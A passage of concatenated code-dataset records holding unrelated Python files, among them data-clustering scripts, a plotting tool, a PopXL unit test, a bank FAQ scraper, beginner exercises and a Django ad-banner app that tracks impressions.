cfg.get('max_likes'))\n\n \n def _validate_cfg_value(self, param_name: str, value):\n if value is None:\n raise ConfigValidationError(f'{param_name} is None')\n if type(value) != int:\n raise ConfigValidationError(f'{param_name} must be type of {int}, got {type(value)}')\n if value < 0:\n raise ConfigValidationError(f'{param_name} must be >= 0, got {value}')\n\n def _init_from_cfg(self, cfg: dict):\n self.max_users = cfg['max_users']\n self.max_posts = cfg['max_posts']\n self.max_likes = cfg['max_likes']\n \n def __str__(self):\n return f'configuration:\\nmax_users: {self.max_users}\\nmax_posts: {self.max_posts}\\n' + \\\n f'max_likes: {self.max_likes}'\n\n\nclass ConfigValidationError(Exception):\n pass","sub_path":"bot/bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3232078","text":"from sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import DBSCAN\nimport numpy as np\nimport re\nimport pandas as pd\nfrom torch import nn,functional as F\nimport torch\n\nclass Setlabel:\n def clearData(self):\n datas=pd.read_csv('datas.csv')\n filter_pattern = re.compile('[^\\u4e00-\\u9fa5,。.,?!;;::a-zA-Z0-9]+$')\n filter_pattern1=re.compile('<.*>')\n for i,value in enumerate(datas['评论']):\n datas['评论'][i]=filter_pattern1.sub('',datas['评论'][i])\n datas['评论'][i] = filter_pattern.sub('', datas['评论'][i])\n if len(datas['评论'][i])<2:\n datas=datas.drop(i)\n datas=datas.drop_duplicates(['评论'],keep='first',)\n datas.to_csv('Cdatas1.csv',index=False)\n\n def kms(self,datas):#kms聚类\n Scores=[]\n for k in range(5,11):\n KMS=KMeans(n_clusters=k)\n KMS.fit(datas)\n Scores.append(silhouette_score(datas,KMS.labels_,metric='euclidean'))\n plt.xlabel('k')\n plt.ylabel('轮廓系数')\n plt.plot(range(2,9),Scores,'o-')\n plt.imsave('picture/BestK.jpg')\n def dbs(self):#dbscan聚类\n datas=pd.read_csv('Cdatas1.csv')\n embed=nn.Embedding(10000,100)\n datas=embed(torch.Tensor([datas['评论']]))\n print(datas)\n # db=DBSCAN(eps=10,min_samples=30)\n # db.fit(datas)\n # labels=db.labels_\n # datas['labels']=labels\n # datas.groupby('labels').count()\n\n def plotFeature(data, clusters, clusterNum):\n nPoints = data.shape[1] #label\n matClusters = np.mat(clusters).transpose()\n fig = plt.figure()\n scatterColors = ['turquoise','violet','quartz','cadetblue','coral','darkmagenta','black', 'blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown'][:clusterNum]\n ax = fig.add_subplot(111)\n for i in range(clusterNum + 1):\n colorSytle = scatterColors[i % len(scatterColors)]\n subCluster = data[:, np.nonzero(matClusters[:, 0].A == i)]\n ax.scatter(subCluster[0, :].flatten().A[0], subCluster[1, :].flatten().A[0], c=colorSytle, s=50)\n plt.imsave('picture/分类效果图.jpg')\n def worldembedding(self):\n torch\n def setlabe(self):\n datas=pd.read_csv('trainSet.csv',sep='\\t')\n for v,i in enumerate(datas.iterrows()):\n if v%10==0:\n print(datas.columns.values)\n print(datas['text_a'][v])\n while True:\n try:\n datas.iloc[v, 2:]=list(input())\n except Exception as e:\n print(\"输入有误\")\n continue\n else:\n break\n datas.to_csv('trainSet.csv',sep='\\t',index=False)\n def ran(self):\n datas=pd.read_csv('trainSet.csv',sep='\\t')\n import random\n datas['难过']=np.random.randint(0,2,datas.shape[0])\n datas['开心']=np.random.randint(0,2,datas.shape[0])\n datas['赞赏']=np.random.randint(0,2,datas.shape[0])\n datas['批评']=np.random.randint(0,2,datas.shape[0])\n datas['怀疑']=np.random.randint(0,2,datas.shape[0])\n datas['喜欢']=np.random.randint(0,2,datas.shape[0])\n datas['惊叹']=np.random.randint(0,2,datas.shape[0])\n datas['鼓励']=np.random.randint(0,2,datas.shape[0])\n print(datas['text_a'])\n datas.to_csv('trainSet.csv', sep='\\t', index=False)\n\n#\n# dataset=Setlabel()\n# # dataset.clearData()\n# dataset.ran()\ndef CD2():\n datas=pd.read_csv('datase.csv')\n datas.rename(columns={'评论':'text_a'},inplace=True)\n datas.to_csv('Cdatas.csv',index=False)\ndef splitSet():\n datas = pd.read_csv('enddatas.csv',sep='\\t')\n\n from sklearn.utils import shuffle\n datas = shuffle(datas)\n trainSet=datas.iloc[:-1100,:]\n testSet=datas.iloc[-1100:-550,:]\n devSet=datas.iloc[-550:-100,:]\n preSet=datas.iloc[:-100,:0]\n trainSet.to_csv('trainSet.csv',index=False,sep='\\t')\n devSet.to_csv('devSet.csv',index=False,sep='\\t')\n testSet.to_csv('testSet.csv',index=False,sep='\\t')\n preSet.to_csv('preSet.csv',index=False,sep='\\t')\n# splitSet()\n\n","sub_path":"setlebal.py","file_name":"setlebal.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104837091","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/3/9 0009\n# @Author : yang\n# @Email : 2635681517@qq.com\n# @File : 49.py\n\"\"\"计算字符串的长度\"\"\"\n\n\ndef leng(string1):\n count = 0\n for _ in string1:\n count = count + 1\n return count\n print(count)\n\n\ndef leng1(string1):\n rest = 0\n for i in range(1, leng(string1) + 1):\n rest = rest + 1\n print(rest)\n\n\nstring1 = 'yang '\nprint(len(string1))\nif __name__ == \"__main__\":\n string1 = 'yang '\n # leng(string1)\n leng1(string1)\n","sub_path":"Interview/5/49.py","file_name":"49.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542234956","text":"\"\"\"\nPlots output of experimental results file\n\"\"\"\nimport context\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef graph(args):\n means = {}\n std = {}\n labels = []\n for fname in args.data:\n with open(fname, 'r') as f:\n results = json.load(f)\n for i,graph in enumerate(results):\n if graph != 'graph 1': continue\n if graph=='time':continue\n data = results[graph]\n if args.use_baseline:\n for k in data:\n if k == 'baseline': continue\n for i in range(len(data[k])):\n data[k][i] -= data['baseline'][i]\n for k in data:\n if k == 'baseline': continue\n if k in args.skip: continue\n if k not in means:\n means[k] = []\n std[k] = []\n labels.append(k)\n #means[k].append(-1*np.mean(data[k]))\n means[k].append(np.mean(data[k]))\n std[k].append(np.std(data[k]))\n if args.labels:\n labels = args.labels\n if args.x_vals:\n x_vals = args.x_vals\n else:\n k = list(means.keys())[0]\n x_vals = list(range(len(means[k])))\n for k in means:\n print(k)\n print(len(x_vals))\n print(len(means[k]))\n assert len(x_vals) == len(means[k])\n assert len(x_vals) == len(std[k])\n\n plt.rcParams.update({'font.size':32})\n plt.rcParams.update({'pdf.fonttype':42})\n plt.rcParams.update({'ps.fonttype':42})\n if args.y_lims:\n plt.ylim(args.y_lims[0], args.y_lims[1])\n for k in means:\n plt.errorbar(x_vals, means[k],linewidth=5)\n plt.legend(labels)\n if args.x_axis:\n plt.xlabel(args.x_axis)\n if args.y_axis:\n plt.ylabel(args.y_axis)\n if args.title:\n plt.title(args.title)\n plt.show()\n\n \n\n #plt.rcParams.update({'font.size':8})\n #fig, ax = plt.subplots(len(list(results.keys())), 1, figsize=(15,10))\n\n #for i,graph in enumerate(results):\n # data = results[graph]\n # if args.use_baseline:\n # for k in data:\n # if k == 'baseline': continue\n # for i in range(len(data[k])):\n # data[k][i] -= data['baseline'][i]\n # for k in data:\n # if k == 'baseline': continue\n # if k in args.skip: continue\n # for j in range(len(data[k])):\n # data[k][j] *= -1\n # if len(results) > 1:\n # axs = ax[i]\n # else:\n # axs = ax\n # avg = {k:sum(data[k])/len(data[k]) for k in data}\n # err_pos = {}\n # err_neg = {}\n # for k in data:\n # if k == 'baseline':\n # continue\n # if k in args.skip:\n # continue\n # err_p = []\n # err_n = []\n # mu = avg[k]\n # for p in data[k]:\n # if p > mu:\n # err_p.append(p - mu)\n # else:\n # err_n.append(mu - p)\n # if len(err_p): \n # err_pos[k] = sum(err_p) / len(err_p)\n # else:\n # err_pos[k] = 0\n\n # if len(err_n):\n # err_neg[k] = sum(err_n) / len(err_n)\n # else:\n # err_neg[k] = 0\n\n # worst_case = {k:max(data[k]) for k in data}\n # \n # labels = list(k for k in data.keys() if k != 'baseline' and k not in args.skip)\n\n # positions = list(range(len(labels)))\n\n # axs.errorbar(positions, [worst_case[labels[i]] for i in positions], fmt='ro')\n # axs.errorbar(positions, [avg[labels[i]] for i in positions],\n # [[err_neg[labels[i]] for i in positions], [err_pos[labels[i]] for i in positions]], fmt='o')\n # axs.set_xticks(positions)\n # axs.set_xticklabels(labels)\n #if args.output:\n # plt.savefig(args.output)\n #else:\n # plt.show()\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('data', nargs='+', default=['results.json'], help='datafile to graph')\n parser.add_argument('--use_baseline', action='store_true', help='Flag should be present if baseline is subtracted from results')\n parser.add_argument('--skip', default = [], nargs='+', help='labels to skip graphing')\n parser.add_argument('--x_vals', nargs='+', type=float, help='x-axis values per results file')\n parser.add_argument('-o', '--output', help='output file')\n parser.add_argument('--x_axis', help=\"x-axis label\")\n parser.add_argument('--y_axis', help=\"y-axis label\")\n parser.add_argument('--labels', nargs='+', help='legend labels')\n parser.add_argument('--title', help='Figure Title')\n parser.add_argument(\"--y_lims\", nargs=2, type=float, help=\"Y-axis limits\")\n args = parser.parse_args()\n graph(args)\n\n\n\n\n","sub_path":"graphing/plot_results2.py","file_name":"plot_results2.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427244827","text":"# Copyright (c) 2022 Graphcore Ltd. All rights reserved.\nimport popxl\nimport popxl.ops as ops\nimport numpy as np\nimport torch\n\n\nclass TestCos:\n def test_cos(self):\n input_data = np.random.rand(10, 20).astype(\"float32\")\n ir = popxl.Ir()\n main = ir.main_graph\n\n with main:\n t = popxl.constant(input_data, popxl.float32, name=\"input_0\")\n o = ops.cos(t)\n # host store\n o_d2h = popxl.d2h_stream(o.shape, o.dtype, name=\"out_stream\")\n ops.host_store(o_d2h, o)\n\n # get the result\n with popxl.Session(ir, \"ipu_model\") as session:\n outputs = session.run()\n\n # cos in torch\n torch_t = torch.tensor(input_data).type(torch.float32)\n torch_outputs = torch_t.cos()\n\n # compare the result between PopXL and torch\n np.testing.assert_allclose(\n torch_outputs.detach().numpy(),\n list(outputs.values())[0],\n rtol=1e-6,\n atol=1e-6,\n )\n","sub_path":"tests/integration/popxl/test_cos.py","file_name":"test_cos.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249859910","text":"import os\nimport logging\nimport logging.config\nimport logging.handlers\nimport yaml\n\n\nclass Config:\n MONGO_URI = os.environ.get(\"MONGO_URI\") or \"mongodb://localhost:27017/myDatabase\"\n # Change this secret key in production\n SECRET_KEY = os.environ.get(\"SECRET_KEY\") or \"IO7i69COm4xQhstA\"\n TESTING = False\n\n\ndef setup_logging(\n default_path=\"logging.yaml\", default_level=logging.INFO, env_key=\"LOG_CFG\"\n):\n \"\"\"Setup logging configuration\n\n \"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, \"rt\") as f:\n config = yaml.safe_load(f.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167347514","text":"from turtle import *\nimport random\n\nmouse = Turtle()\nmouse.ht()\nmouse.pu()\nc=getcanvas()\nCANVAS_WIDTH = c.winfo_width()\nCANVAS_HEIGHT = c.winfo_height()\n\nclass Cell(Turtle):\n\tdef __init__(self,r,x,y,dx,dy,color='black'):\n\t\tTurtle.__init__(self)\n\t\tself.penup()\n\t\tself.color(\"blue\",color)\n\t\tself.goto(x,y)\n\t\tself.r = r\n\t\tself.dx = dx\n\t\tself.dy = dy\n\t\tself.shape(\"circle\")\n\t\tself.ht()\n\tdef get_radius(self):\n\t\treturn self.r\n\tdef get_dx(self):\n\t\treturn self.dx\n\tdef get_dy(self):\n\t\treturn self.dy\n\tdef set_radius(self,r):\n\t\tif(r<100):\n\t\t\tself.r = r\n\tdef set_dx(self,dx):\n\t\tself.dx = dx\n\tdef set_dy(self,dy):\n\t\tself.dy = dy\n\tdef get_speed(self):\n\t\treturn 150 / (self.r)\n\n\n\ndef create_cell(cell):\n\tgetscreen().tracer(0)\n\tif ('color' in cell.keys()):\n\t\tc = Cell(cell['radius'],cell['x'],cell['y'],cell['dx'],cell['dy'],cell['color'])\n\telse:\n\t\tc = Cell(cell['radius'],cell['x'],cell['y'],cell['dx'],cell['dy'])\n\treturn c\n\ndef move_cell(c):\n\tx = c.xcor()\n\tdx = c.get_dx()\n\ty = c.ycor()\n\tdy = c.get_dy()\n\tr = c.get_radius()\n\tc.goto(x+dx,y+dy-r)\n\tc.begin_fill()\n\tc.pd()\n\tc.circle(c.get_radius())\n\tc.pu()\n\tc.end_fill()\n\tx = c.xcor()\n\tdx = c.get_dx()\n\ty = c.ycor()\n\tdy = c.get_dy()\n\tr = c.get_radius()\n\tc.goto(x+dx,y+dy+r)\n\ndef move_cells(cells):\n\tht()\n\tfor c in cells:\n\t\tc.clear()\n\t\tmove_cell(c)\n\tgetscreen().update()\n\ndef create_screen(width, height):\n\tgetscreen().screensize(width,height)\n\ndef get_screen_width():\n\tglobal CANVAS_WIDTH\n\treturn CANVAS_WIDTH/2-10\n\ndef get_screen_height():\n\tglobal CANVAS_HEIGHT\n\treturn CANVAS_HEIGHT/2-5\n\ndef get_x_mouse():\n\tglobal mouse\n\treturn mouse.xcor()\n\ndef get_y_mouse():\n\tglobal mouse\n\treturn mouse.ycor()\n\ndef movearound(event):\n\tglobal CANVAS_WIDTH\n\tglobal CANVAS_HEIGHT\n\tmouse.goto(event.x-c.winfo_width()/2,c.winfo_height()/2-event.y)\n\tif(CANVAS_WIDTH != c.winfo_width() or CANVAS_HEIGHT != c.winfo_height()):\n\t\tgetscreen().screensize(c.winfo_width()/2,c.winfo_height()/2)\n\t\tCANVAS_WIDTH = c.winfo_width()\n\t\tCANVAS_HEIGHT = c.winfo_height()\n\ndef get_user_direction(cell):\n\tmouse_x = get_x_mouse()\n\tmouse_y = get_y_mouse()\n\n\tuser_speed = cell.get_speed()\n\tdistance = ((mouse_x - cell.xcor() )**2 + (mouse_y - cell.ycor())**2)**0.5\n\n\tif abs(mouse_x - cell.xcor()) < cell.get_radius():\n\t\txdir = 0\n\telse:\n\t\txdir = int(user_speed * (mouse_x - cell.xcor()) / distance)\n\n\tif abs(mouse_y - cell.ycor()) < cell.get_radius():\n\t\tydir = 0\n\telse:\n\t\tydir = int(user_speed * (mouse_y - cell.ycor()) / distance)\n\n\treturn (xdir, ydir)\n\ndef get_random_x():\n\treturn random.randint(-get_screen_width(), get_screen_width())\ndef get_random_y():\n\treturn random.randint(-get_screen_height(), get_screen_height())\n\nc.bind(\"\", movearound)\ngetscreen().listen()","sub_path":"meet.py","file_name":"meet.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"517438257","text":"\"\"\"\nEXERCÍCIO 030: Par ou Ímpar?\nCrie um programa que leia um número inteiro e mostre na tela se ele é PAR ou ÍMPAR.\n\"\"\"\n\nn = float(input('Digite um número: '))\nr = n % 2\nif r == 0:\n print('O número {} é par.'.format(n))\nelse:\n print('O número {} é impar.'.format(n))","sub_path":"Exercícios Python/ex030_Par ou impar.py","file_name":"ex030_Par ou impar.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325304721","text":"def fibo(n):\n if n <= 1:\n return n\n else:\n return (fibo(n-1) + fibo(n-2))\n\n\nn = int(input(\"Enter a positive number: \"))\n\nif n < 0:\n print(\"You entered a neg number\")\nelse:\n print(\"Fibonacci sequence:\")\n for i in range(n):\n # print(i)\n print(fibo(i))\n","sub_path":"python_lynda/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346634427","text":"__author__ = \"ALEX-CHUN-YU (P76064538@mail.ncku.edu.tw)\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\n\n#中國信託信用卡QA爬蟲者\nclass Crawler:\n\t\n\tdef __init__(self):\n\t\tself.session = requests.session()\n\t\tself.root = 'https://www.ctbcbank.com/CTCBPortalWeb/appmanager/ebank/rb?_nfpb=true&_pageLabel=TW_RB_CM_service_000007&_windowLabel=T24004047331358757232751&_nffvid=%2FCTCBPortalWeb%2Fpages%2FcallCenter%2FcallCenterIntro.faces&firstView=true'\n\n\tdef crawl(self):\n\t\tqa = {}\n\t\tqa_list = []\n\t\tq = self.get_question()\n\t\ta = self.get_answer()\n\t\tfor i in range(len(q)):\n\t\t\tqa['question'] = q[i]\n\t\t\tqa['answer'] = a[i]\n\t\t\tqa_list.append(qa.copy())\n\t\tself.ouput_board_page_articles_json(qa_list)\n\t\t#print(qa_list)\n\n\tdef get_question(self):\n\t\tquestion = []\n\t\ttry:\n\t\t\t#request url\n\t\t\tres = self.session.get(self.root)\n\t\t\t#successful request\n\t\t\tif res.status_code == 200:\n\t\t\t\tsoup = BeautifulSoup(res.text, \"html.parser\")\n\t\t\t\tfor q in soup.select(\".greenlink1-2\"):\n\t\t\t\t\tquestion.append(q.text.strip('\\n').strip(' ').strip('\\t').strip(' \\n').strip('Q:'))\n\t\t\treturn question\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\tdef get_answer(self):\n\t\tanswer = []\n\t\ttry:\n\t\t\t#request url\n\t\t\tres = self.session.get(self.root)\n\t\t\t#successful request\n\t\t\tsoup = BeautifulSoup(res.text, \"html.parser\")\n\t\t\t#print(soup)\n\t\t\tfor a in soup.select(\".eventgraybox02\"):\n\t\t\t\t#print('answer ' + a.text)\n\t\t\t\tanswer.append(a.text.strip('\\n').strip(' ').strip('\\t').strip(' \\n').strip('A:'))\n\t\t\treturn answer\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\t#輸出JSON格式\n\tdef ouput_board_page_articles_json(self, res = None):\n\t\tif not os.path.exists(\"CTBC_Crawl_Result\"):\n\t\t\tos.makedirs(\"CTBC_Crawl_Result\")\n\t\twith open(\"CTBC_Crawl_Result/\" + 'CTBC2' + \".json\" , 'wb') as f:\n\t\t\tf.write(json.dumps(res, indent = 4, ensure_ascii = False).encode('utf-8'))","sub_path":"CTBC_ChatbotTest/CTBC_QA_Crawler/CTBC_Crawler2.py","file_name":"CTBC_Crawler2.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121019276","text":"\"\"\"Admin of Zinnia CMS Plugins\"\"\"\nfrom django.contrib import admin\nfrom django.template import RequestContext\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.plugin_rendering import render_placeholder\nfrom cms.admin.placeholderadmin import PlaceholderAdmin\n#dm\nfrom cms.plugins.utils import get_plugins\nfrom cms.plugin_rendering import render_plugins\nfrom cms.utils.django_load import iterload_objects\n\nfrom zinnia.models.entry import Entry\nfrom zinnia.admin.entry import EntryAdmin\nfrom zinnia.settings import ENTRY_BASE_MODEL\n\n\nclass EntryPlaceholderAdmin(PlaceholderAdmin, EntryAdmin):\n \"\"\"EntryPlaceholder Admin\"\"\"\n fieldsets = ((None, {'fields': ('title', 'image', ('status','page_link'))}),\n (_('Dates'), {'fields': ( ('event_timedate', 'end_publication'),\n ('start_publication', 'creation_date'),\n ),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Content'), {'fields': ('content_placeholder',),\n 'classes': ('plugin-holder',\n 'plugin-holder-nopage')}),\n (_('Content Original'), {'fields': ('content',),\n #'classes': ('collapse', 'collapse-open')\n }),\n (_('Options'), {'fields': ( 'featured',\n 'excerpt', 'template',\n 'related', 'authors',\n# 'creation_date',\n# ('start_publication','end_publication')\n ),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Privacy'), {'fields': ('password', 'login_required',),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Discussion'), {'fields': ('comment_enabled',\n 'pingback_enabled'),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Publication'), {'fields': ('sites', 'categories',\n 'tags', 'slug')}))\n\n def save_model(self, request, entry, form, change):\n \"\"\"Fill the content field with the interpretation\n of the placeholder\"\"\"\n context = RequestContext(request)\n #dm\n processors = iterload_objects(settings.CMS_PLUGIN_PROCESSORS)\n plugins = [plugin for plugin in get_plugins(request, entry.content_placeholder)]\n render = render_plugins(plugins, context, entry.content_placeholder)\n content = \"\".join(render)\n entry.placeholder_render = content\n #entry.placeholder_render = render_placeholder(entry.content_placeholder, context )\n #entry.content = render_placeholder(entry.content_placeholder, context)\n entry.save()\n super(EntryPlaceholderAdmin, self).save_model(\n request, entry, form, change)\n\n save_on_top = True\n #media = property(EntryAdmin.media)\n\nif ENTRY_BASE_MODEL == 'cmsplugin_zinnia.placeholder.EntryPlaceholder':\n admin.site.unregister(Entry)\n admin.site.register(Entry, EntryPlaceholderAdmin)\n","sub_path":"cmsplugin_zinnia/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654345312","text":"'''\nCreated on Aug 5, 2019\n\n@author: DCahall\n'''\nimport tensorflow as tf\nimport numpy as np\nfrom DifferentiableArgmaxApproximation.DifferentiableArgmaxApproximation import DifferentiableArgmaxApproximation\n\n\ndef main():\n sess = tf.Session()\n x = tf.placeholder(dtype=tf.float64, shape=(None,))\n \n beta = 100\n y = DifferentiableArgmaxApproximation(x, beta)\n \n print(\"I can compute the gradient\", tf.gradients(y, x))\n \n ## Compare the actual argmax to the approximation\n ## Should be fairly close (assuming there is one unique argmax)\n for _ in range(10):\n data = np.random.randn(10)\n print(data.argmax(), sess.run(y, feed_dict={x:data/np.linalg.norm(data)}))\n \nif __name__==\"__main__\":\n main()\n exit()\n ","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84345332","text":"import time\n\nfrom sensor import Sensor\nfrom claw import Claw\n# noinspection PyUnresolvedReferences\nfrom sr.robot import Robot\n\n\ndef main():\n claw = Claw(Robot())\n sensors = [Sensor(\"Front\", 4), Sensor(\"BackRight\", 1), Sensor(\"BackLeft\", 3),\n Sensor(\"Back\", 2)]\n\n claw.close()\n\n while True:\n for sensor in sensors:\n sensor.get_distance()\n\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Tests/sensor_test.py","file_name":"sensor_test.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325394825","text":"import time\n\n\ndef countdown(func):\n def return_time():\n num = 3\n while num:\n print(num)\n time.sleep(1)\n num -= 1\n result = func()\n return result\n return return_time\n\n\n@countdown\ndef what_time_is_it_now() -> str:\n return time.strftime('%H:%M')\n\n\nprint(what_time_is_it_now())\n","sub_path":"homework_06/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555278867","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView, CreateView, UpdateView, ListView, View, TemplateView\nfrom django.views.generic.base import RedirectView\nfrom .models import Banner, BannerStats, Profile\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom datetime import datetime\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse\nimport json\nimport urllib2\n\n\n# Define Banners CRUD\n\nclass BannersList(ListView):\n\n\ttemplate_name = 'banners/banners.html'\n\tcontext_object_name = 'banners'\n\n\tdef get_queryset(self):\n\t\treturn Banner.objects.select_related('clientid').filter(clientid=self.request.user)\n\n# select_related allows to decrease the amount of sql queries\n# when it comes to session queries, redis cache for django is an option to look into\n\nclass BannerStatsDetail(DetailView):\n\n\ttemplate_name = 'banners/banner_stats.html'\n\tcontext_object_name = 'banner_stats'\n\n\tdef get_queryset(self, **kwargs):\n\t\tbannerid = self.kwargs['pk']\n\t\treturn BannerStats.objects.filter(banner=bannerid)\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(BannerStatsDetail, self).get_context_data(**kwargs)\n\t\tcontext['impressions'] = kwargs['banner_stats']\n\t\treturn context\n\n\nclass CreateBanner(CreateView):\n\n\tmodel = Banner\n\tfields = [\n\t\t'title', 'type', 'description',\n\t\t'custom_text', 'status', 'priority',\n\t\t'start_date', 'end_date', 'image', 'redirect_url'\n\t]\n\ttemplate_name = \"banners/banner_edit.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse('banners')\n\n\tdef form_valid(self, form):\n\t\tform.instance.clientid = self.request.user\n\t\treturn super(CreateBanner, self).form_valid(form)\n\n\nclass BannerUpdate(UpdateView):\n\n\tmodel = Banner\n\ttemplate_name = 'banners/banner_edit.html'\n\tfields = [\n\t\t'title', 'type', 'description',\n\t\t'custom_text', 'status', 'priority',\n\t\t'start_date', 'end_date', 'image', 'redirect_url'\n\t]\n\tsuccess_url = \"/banners/\"\n\n\tdef get_queryset(self):\n\t\tbase_qs = super(BannerUpdate, self).get_queryset()\n\t\treturn base_qs.filter(clientid=self.request.user)\n\n\n# User Profile View\n\nclass UserProfile(UpdateView):\n\tmodel = Profile\n\ttemplate_name = 'auth/profile.html'\n\tfields = [\n\t\t'brand_name', 'company_logo', 'background_logo'\n\t]\n\tsuccess_url = \"/account/profile\"\n\n\tdef get_object(self):\n\t\tprofile_object = Profile.objects.get(user=self.request.user)\t\n\t\treturn profile_object\n\n\n# Define Front end for banners\t\n\nclass DefaultBanner(TemplateView):\n\n\ttemplate_name = 'front/default.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\t# Call the base implementation first to get a context\n\t\tcontext = super(DefaultBanner, self).get_context_data(**kwargs)\n\t\t# Add in a QuerySet of all the books\n\t\tclient_name = self.kwargs.get('client')\n\t\t# Match the username to the id to pass for a banner\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tcontext['profile'] = get_object_or_404(Profile, user=userid)\n\t\tcontext['mac'] = self.request.GET.get('mac')\n\t\treturn context\n\n# Define default clicks web banner\n\nclass ClicksWebBanner(TemplateView):\n\n\ttemplate_name = 'front/clicks.html'\n\tactive_banner = BannerStats()\n\n\t# function to get the active banner\n\tdef get_active_banner(self, userid):\n\n\t\tself.active_banner = Banner.objects.filter(clientid=userid).filter(status=True).filter(\n\t\t\t\tstart_date__lte=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\tend_date__gte=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),)[0]\n\n\t\n\t# Function to get the client ip\n\tdef get_client_ip(self):\n\t\tip = self.request.META.get(\"HTTP_X_FORWARDED_FOR\", None)\n\t\tif ip:\n\t\t\tip = ip.split(\", \")[0]\n\t\telse:\n\t\t\tip = self.request.META.get(\"REMOTE_ADDR\", \"\")\n\t\treturn ip\n\n\n\tdef get_device_type(self):\n\t\treturn self.request.user_agent.device.family\n\n\tdef get_os_type(self):\n\t\treturn self.request.user_agent.os.family\n\n\tdef get_browser_type(self):\n\t\treturn self.request.user_agent.browser.family\n\n\tdef get_mac_address(self):\n\t\tif self.request.GET:\n\t\t\tmac = self.request.GET.get('mac')\n\t\telse:\n\t\t\tmac = 'None'\n\t\treturn mac\n\n\n\t# Main function to track the banner stats\n\tdef tracking_banner_stat(self):\n\t\ttry:\n\t\t\tBannerStats.objects.get(session=self.request.session.session_key)\n\t\texcept ObjectDoesNotExist:\n\t\t\t# import socket\n\t\t\t# dns = str(socket.getfqdn(self.get_client_ip())).split('.')[-1]\n\t\t\t# put if int(dns) after try, else: pass\n\t\t\ttry:\n\t\t\t\tif not self.request.session.session_key:\n\t\t\t\t\tself.request.session.save()\n\t\t\t\tstat = BannerStats(banner=self.active_banner,\n\t\t\t\t\t\t\t\t\tip=self.get_client_ip(),\n\t\t\t\t\t\t\t\t\tmac = self.get_mac_address(),\n\t\t\t\t\t\t\t\t\tclicks = 0,\n\t\t\t\t\t\t\t\t\timpressions = 1,\n\t\t\t\t\t\t\t\t\tdate = datetime.now(),\n\t\t\t\t\t\t\t\t\tdevice_type = self.get_device_type(),\n\t\t\t\t\t\t\t\t\tos_type = self.get_os_type(),\n\t\t\t\t\t\t\t\t\tbrowser_type = self.get_browser_type(),\n\t\t\t\t\t\t\t\t\tsession=self.request.session.session_key)\n\t\t\t\tstat.save()\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(ClicksWebBanner, self).get_context_data(**kwargs)\n\t\tclient_name = self.kwargs.get('client')\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tactive_banner = self.get_active_banner(userid)\n\t\tcontext['profile'] = get_object_or_404(Profile, user=userid)\n\t\tcontext['banner'] = 